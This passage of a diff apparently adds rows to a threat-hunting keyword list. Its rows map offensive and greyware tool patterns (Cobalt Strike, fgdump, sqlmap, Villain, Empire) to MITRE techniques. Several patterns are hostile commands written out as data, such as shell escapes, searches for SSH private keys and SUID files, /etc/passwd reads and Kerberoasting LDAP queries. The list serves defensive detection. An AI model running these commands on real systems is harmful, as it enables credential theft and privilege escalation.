+"*ffuf_*_freebsd_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*ffuf_*_linux_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" 
+"*ffuf_*_macOS_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*ffuf_*_openbsd_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*ffuf_*_windows_*.zip*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*ffuf-master.zip*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*fgddmllnllkalaagkghckoinaemmogpe*","greyware_tool_keyword","ExpressVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*fgdump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
+"*fgexec.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*ficajfeojakddincjafebjmfiefcmanc*","greyware_tool_keyword","Best VPN USA","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*fierce --domain* --dns-servers *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*FiercePhish*","offensive_tool_keyword","FiercePhish","FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns. schedule sending of emails. and much more. The features will continue to be expanded and will include website spoofing. click tracking. and extensive notification options. 
","T1566 - T1566.001 - T1566.002 - T1566.003","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Phishing","https://github.com/Raikia/FiercePhish","1","1","N/A","N/A","10","1214","273","2023-05-18T15:38:38Z","2016-12-31T19:41:24Z" +"*Fiesta Exploit Kit*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*File_Smuggler_Http_Handler*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z"
+"*FileControler/FileControler_x64.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z"
+"*FileControler/FileControler_x86.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z"
+"*File-Extensions-Wordlist.txt*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z"
+"*fileless-elf-exec*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z"
+"*FilelessPELoader.cpp*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in 
memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z"
+"*FilelessPELoader.exe*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z"
+"*FilelessPELoader.vcxproj*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z"
+"*FilelessPELoader-main*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z"
+"*FilelessShellcode.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*FilelessShellcode.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - 
T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*FilelessShellcode.sln*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*FilelessShellcode.vcxproj*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*filemsf.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*--file-read=/etc/passwd*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation 
tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*files/BindShell.exe*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*files/team-edward.py*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*filezilla2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*-filter *(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32*","greyware_tool_keyword","dsquery","Finding users Not Required to Have a Password","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*-filter *(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304*","greyware_tool_keyword","dsquery","Finding accounts with Kerberos Pre-Authentication Disabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*-filter 
*(&(objectClass=User)(msDS-AllowedToDelegateTo=*","greyware_tool_keyword","dsquery","Finding accounts with constrained delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*-filter *(&(objectClass=user)(servicePrincipalName=*)(!(cn=krbtgt))(!(samaccounttype=805306369*","greyware_tool_keyword","dsquery","Finding Kerberoastable Users","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*-filter *(&(objectClass=User)(serviceprincipalname=*)(samaccountname=* -limit 0 -attr samaccountname serviceprincipalname*","greyware_tool_keyword","dsquery","Finding accounts with SPNs","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*-filter *(userAccountControl:1.2.840.113556.1.4.803:=524288)*","greyware_tool_keyword","dsquery","Finding accounts with unconstrained delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","7","10","N/A","N/A","N/A","N/A" +"*finalrecon.py --*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*find . 
-exec /bin/sh \; -quit*","greyware_tool_keyword","find","It can be used to break out from restricted environments by spawning an interactive system shell.","T1059.004 - T1219 - T1027","TA0002 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*find . -name spring-beans*.jar*","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","0","N/A","N/A","4","335","106","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z" +"*find / * -4000 -type f -print*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*find / * -perm -2000 -type f -print*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*find / * -regextype egrep -iregex*\.kdbx*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*find / -name authorized_keys *> /dev/null*","greyware_tool_keyword","find","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - 
TA0010","N/A","N/A","discovery","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -name id_dsa 2>*","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -name id_rsa *> /dev/null*","greyware_tool_keyword","find","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -name id_rsa 2>*","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -perm /2000 -ls 2>/dev/null*","greyware_tool_keyword","find","Find SGID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*find / -perm +4000 -type f 2>/dev/null*","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*find / -perm +8000 -ls 2>/dev/null*","greyware_tool_keyword","find","Find SGID enabled 
files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*find / -perm -2000","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -perm -4000","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.# sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -perm -4000 -type f *","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*find / -perm -g=s","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -perm -u=s","greyware_tool_keyword","find","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. 
sticky bits","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*find / -perm -u=s -type f 2>/dev/null*","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*find / -perm -u=s -type f -group */dev/null*","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*find / -uid 0 -perm -4000 -type f *","greyware_tool_keyword","find","Find SUID enabled files","T1044 - T1083","TA0007 - TA0009","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" +"*find / -user root -perm -6000 -type f 2>*","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find /* -perm -04000 -o -perm -02000*","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","greyware_tools high risks of false 
positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find /* -perm -u=s -type f 2>*","greyware_tool_keyword","find","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" +"*find_and_load_coerce_methods*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"*find_domain.sh *","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*find_payload(*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","0","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*Find-4624Logons*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - 